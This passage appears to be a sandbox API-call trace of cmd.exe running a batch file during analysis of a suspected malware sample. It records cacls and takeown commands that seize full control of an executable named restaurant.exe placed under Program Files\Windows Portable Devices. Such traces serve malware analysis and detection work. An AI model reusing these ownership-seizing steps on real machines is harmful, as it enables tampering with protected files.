lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0xffffffff [0280.691] GetLastError () returned 0x2 [0280.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.691] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0xffffffff [0280.691] GetLastError () returned 0x2 [0280.691] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0x1270b68 [0280.691] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0280.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0xffffffff [0280.691] GetLastError () returned 0x2 [0280.691] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xfce800, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce800) returned 0x1270b68 [0280.691] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0280.691] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.691] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.691] GetConsoleTitleW (in: lpConsoleTitle=0xfcecf4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.694] InitializeProcThreadAttributeList (in: lpAttributeList=0xfcec20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xfcec04 | out: lpAttributeList=0xfcec20, lpSize=0xfcec04) returned 1 [0280.694] UpdateProcThreadAttribute (in: lpAttributeList=0xfcec20, dwFlags=0x0, Attribute=0x60001, lpValue=0xfcec0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xfcec20, lpPreviousValue=0x0) returned 1 [0280.695] GetStartupInfoW (in: lpStartupInfo=0xfcec58 | out: lpStartupInfo=0xfcec58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0280.695] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0280.696] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0280.697] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xfceba8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfcebf4 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xfcebf4*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xff0, dwThreadId=0xfe0)) returned 1 [0280.705] CloseHandle (hObject=0xb0) returned 1 [0280.705] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0280.705] GetEnvironmentStringsW () returned 0x1279e00* [0280.705] FreeEnvironmentStringsA (penv="=") returned 1 [0280.705] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0285.213] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xfceb8c | out: lpExitCode=0xfceb8c*=0x0) returned 1 [0285.213] CloseHandle (hObject=0xb8) returned 1 [0285.213] _vsnwprintf (in: _Buffer=0xfcec74, _BufferCount=0x13, _Format="%08X", _ArgList=0xfceb94 | out: _Buffer="00000000") returned 8 [0285.213] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0285.213] GetEnvironmentStringsW () returned 0x127e318* [0285.213] FreeEnvironmentStringsA (penv="=") returned 1 [0285.213] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0285.213] GetEnvironmentStringsW () returned 0x127e318* [0285.213] FreeEnvironmentStringsA (penv="=") returned 1 [0285.213] DeleteProcThreadAttributeList (in: lpAttributeList=0xfcec20 | out: lpAttributeList=0xfcec20) [0285.213] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.213] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0285.273] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.273] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0285.273] _get_osfhandle (_FileHandle=0) returned 0x38 [0285.273] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0285.273] SetConsoleInputExeNameW () returned 0x1 [0285.273] GetConsoleOutputCP () returned 0x1b5 [0285.273] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0285.273] SetThreadUILanguage (LangId=0x0) returned 0x409 [0285.273] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcf3b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0285.273] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0285.273] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.273] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0285.274] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.274] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0285.274] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0xc2, lpOverlapped=0x0) returned 1 [0285.274] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0285.274] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0285.274] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.274] GetFileType (hFile=0xb8) returned 0x1 [0285.274] _get_osfhandle (_FileHandle=3) returned 0xb8 [0285.274] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0285.275] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0285.275] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0285.275] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0285.275] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0285.275] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0285.275] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0285.275] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0285.276] _tell (_FileHandle=3) returned 47 [0285.276] _close (_FileHandle=3) returned 0 [0285.276] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf148 | out: _Buffer="\r\n") returned 2 [0285.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.276] GetFileType (hFile=0x3c) returned 0x2 [0285.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf120 | out: lpMode=0xfcf120) returned 1 [0285.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.276] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf138, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf138*=0x2) returned 1 [0285.276] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0285.276] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0285.276] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfcf144 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0285.276] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfcf144 | out: _Buffer=">") returned 1 [0285.276] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.276] GetFileType (hFile=0x3c) returned 0x2 [0285.276] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.276] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf124 | out: lpMode=0xfcf124) returned 1 [0285.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.277] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfcf13c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfcf13c*=0x1e) returned 1 [0285.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.277] GetFileType (hFile=0x3c) returned 0x2 [0285.277] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.277] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3c4 | out: lpMode=0xfcf3c4) returned 1 [0285.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.277] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1277720*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xfcf3dc, lpReserved=0x0 | out: lpBuffer=0x1277720*, lpNumberOfCharsWritten=0xfcf3dc*=0x7) returned 1 [0285.277] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf3e4 | out: _Buffer=" /F \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" ") returned 63 [0285.277] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.277] GetFileType (hFile=0x3c) returned 0x2 [0285.277] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.277] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0285.278] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.278] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x3f) returned 1 [0285.278] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf3f8 | out: _Buffer="\r\n") returned 2 [0285.278] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.278] GetFileType (hFile=0x3c) returned 0x2 [0285.278] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.278] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3d0 | out: lpMode=0xfcf3d0) returned 1 [0285.278] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.278] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3e8*=0x2) returned 1 [0285.278] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0285.278] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0285.278] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0285.278] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0285.278] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0285.278] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0285.278] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0285.278] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0285.278] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0285.278] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0285.278] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0285.278] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0285.279] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0285.279] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0285.279] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0285.279] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0285.279] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0285.279] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0285.279] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0285.279] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0285.279] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0285.279] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0285.279] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0285.279] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0285.279] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0285.279] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0285.279] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0285.279] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0285.279] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0285.279] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0285.279] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0285.279] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0285.279] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0285.279] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0285.279] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0285.279] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0285.279] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0285.279] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0285.279] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0285.279] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0285.279] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0285.279] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0285.279] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0285.279] SetErrorMode (uMode=0x0) returned 0x0 [0285.279] SetErrorMode (uMode=0x1) returned 0x0 [0285.279] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x127f900, lpFilePart=0xfcf194 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfcf194*="Desktop") returned 0x1d [0285.279] SetErrorMode (uMode=0x0) returned 0x1 [0285.279] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0285.279] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0285.280] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.280] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.280] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0xffffffff [0285.280] GetLastError () returned 0x2 [0285.280] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.280] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0xffffffff [0285.280] GetLastError () returned 0x2 [0285.280] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0285.280] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0x1270b68 [0285.280] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0285.280] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0xffffffff [0285.280] GetLastError () returned 0x2 [0285.281] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0x1270b68 [0285.281] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0285.281] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0285.281] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0285.281] GetConsoleTitleW (in: lpConsoleTitle=0xfcef68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0285.281] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0285.281] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0285.281] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0285.281] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0285.281] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0285.281] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0285.281] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0285.281] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0285.281] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0285.281] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0285.281] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0285.281] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0285.281] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0285.281] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0285.281] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0285.281] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0285.281] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0285.281] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0285.281] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0285.281] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0285.281] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0285.281] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0285.281] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0285.281] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0285.281] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0285.281] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0285.281] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0285.281] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0285.282] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0285.282] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0285.282] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0285.282] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0285.282] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0285.282] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0285.282] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0285.282] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0285.282] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0285.282] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0285.282] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0285.282] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0285.282] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0285.282] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0285.282] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0285.282] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0285.282] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0285.282] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0285.282] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0285.282] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0285.282] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0285.282] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0285.282] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0285.282] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0285.282] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0285.282] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0285.282] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0285.282] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0285.282] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0285.282] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0285.282] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0285.282] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0285.282] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0285.282] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0285.282] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0285.282] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0285.282] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0285.282] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0285.282] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0285.282] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0285.282] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0285.282] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0285.282] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0285.282] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0285.282] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0285.282] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0285.282] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0285.282] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0285.282] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0285.282] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0285.282] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0285.283] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0285.283] 